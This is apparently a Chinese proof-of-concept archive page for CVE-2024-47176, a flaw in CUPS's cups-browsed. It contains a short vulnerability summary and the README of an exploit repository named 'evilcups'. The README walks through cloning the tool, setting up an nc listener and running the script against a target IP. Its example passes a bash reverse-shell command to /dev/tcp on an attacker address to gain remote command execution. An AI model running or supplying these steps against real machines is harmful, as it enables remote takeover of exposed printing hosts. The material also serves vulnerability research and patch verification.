关联漏洞
标题:
cups 安全漏洞
(CVE-2024-47176)
描述:cups是cups开源的一个类 Unix 操作系统的组合式印刷系统。 cups存在安全漏洞,该漏洞源于cups-browsed绑定到INADDR_ANY:631,导致它信任来自任何来源的任何数据包,并可能导致向攻击者控制的 URL 发出Get-Printer-Attributes IPP 请求。
介绍
# CVE-2024-47176: Remote Command Execution in CUPS
## Description
CUPS (Common UNIX Printing System) is an open-source printing system that handles networked printers. CVE-2024-47176 specifically targets the cups-browsed functionality, which binds to INADDR_ANY:631, allowing it to trust any packet from any source. By manipulating the Get-Printer-Attributes IPP request, an attacker can send malicious print jobs from a remote system, leading to arbitrary command execution when combined with other vulnerabilities such as CVE-2024-47076 and CVE-2024-47175.
## Steps to Exploit CVE-2024-47176
### Prerequisites
- Access to the target machine with port 631 (IPP) exposed to the internet.
- Python installed on your local machine (for running the exploit script).
- `nmap` installed for scanning the target.
---
### Setup
1. Clone the repository:
```bash
git clone https://github.com/<your-username>/evilcups.git
cd evilcups
```
2. Install the required Python module:
```bash
pip install ippserver
```
3. Ensure you have a listener ready to receive a reverse shell on your local machine. You can use `nc` for this:
```bash
nc -lvnp <port>
```
## Usage
Run the exploit script with the following syntax:
```bash
./evilcups.py <attacker_ip> <target_ip> "<command>"
```
### For example
```bash
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"
```
文件快照
[4.0K] /data/pocs/1eaa1f7858f2fc4ecd1466fb495d463b4e13f83e
├── [7.4K] evilcups.py
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。